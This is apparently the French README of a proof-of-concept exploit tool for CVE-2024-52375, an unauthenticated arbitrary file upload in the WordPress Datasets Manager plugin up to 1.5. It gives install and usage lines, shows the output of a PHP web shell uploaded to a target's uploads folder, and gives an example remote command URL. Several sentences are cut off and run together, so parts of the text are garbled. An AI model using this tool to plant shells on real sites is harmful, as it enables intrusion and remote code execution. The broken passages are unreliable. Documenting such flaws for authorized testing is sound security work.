
Plugin WordPress Datasets Manager par Arttia Creative <= 1.5 - Vulnérabilité de téléversement de fichier arbitraire
💥 Exploit par : Nxploit (Khaled Alenazi)
📅 CVE publiée : 14 novembre 2024
🧠 Score CVSS : 10.0 (Critique)
🛠 CWE-434 : Téléversement sans restriction de fichiers de type dangereux
Une vulnérabilité critique a été découverte dans le plugin WordPress Datasets Manager by Arttia Creative, affectant toutes les versions jusqu'à la version 1.5 incluse.
Le plugin ne valide pas correctement les types de fichiers lors du processus de téléversement, ce qui permet à un attaquant non authentifié de téléverser des fichiers arbitraires — y compris des shells PHP — et d'obtenir une exécution de code à distance (RCE).
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:Hrequests :
pip install requests
usage: CVE-2024-52375.py [-h] -u URL
Exploit for WordPress Datasets Manager <= 1.5 - Arbitrary File Upload | By: Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Full target URL (e.g. http://target.com/wordpress)
Remplacez l'URL par le chemin complet de l'installation WordPress cible.
En cas de succès, le script :
_wpnonce public du frontend.nxploit.php.[+] Shell available at:
http://target.com/wordpress/wp-content/uploads/2025/03/nxploit.php
Vous pouvez ensuite exécuter des commandes comme :
http://target.com/wordpress/wp-content/uploads/2025/03/nxploit.php?cmd=id
readme.txt.<= 1.5 sont vulnérables.Cet outil est fourni uniquement à des fins éducatives et de tests autorisés.
L'utiliser contre des systèmes que vous ne possédez pas ou que vous n'êtes pas autorisé à tester est illégal.